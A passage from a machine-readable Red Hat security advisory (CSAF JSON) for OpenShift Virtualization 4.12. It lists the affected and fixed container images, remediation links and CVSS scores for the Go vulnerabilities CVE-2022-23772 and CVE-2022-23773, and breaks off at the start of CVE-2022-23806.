"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-23772"
},
{
"category": "external",
"summary": "RHBZ#2053532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053532"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-23772",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23772"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ",
"url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ"
}
],
"release_date": "2022-01-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString"
},
{
"cve": "CVE-2022-23773",
"cwe": {
"id": "CWE-1220",
"name": "Insufficient Granularity of Access Control"
},
"discovery_date": "2022-02-11T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2053541"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-23773"
},
{
"category": "external",
"summary": "RHBZ#2053541",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053541"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-23773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23773"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23773",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23773"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ",
"url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ"
}
],
"release_date": "2022-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control"
},
{
"cve": "CVE-2022-23806",
"cwe": {
"id": "CWE-252",
"name": "Unchecked Return Value"
},
"discovery_date": "2022-02-11T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
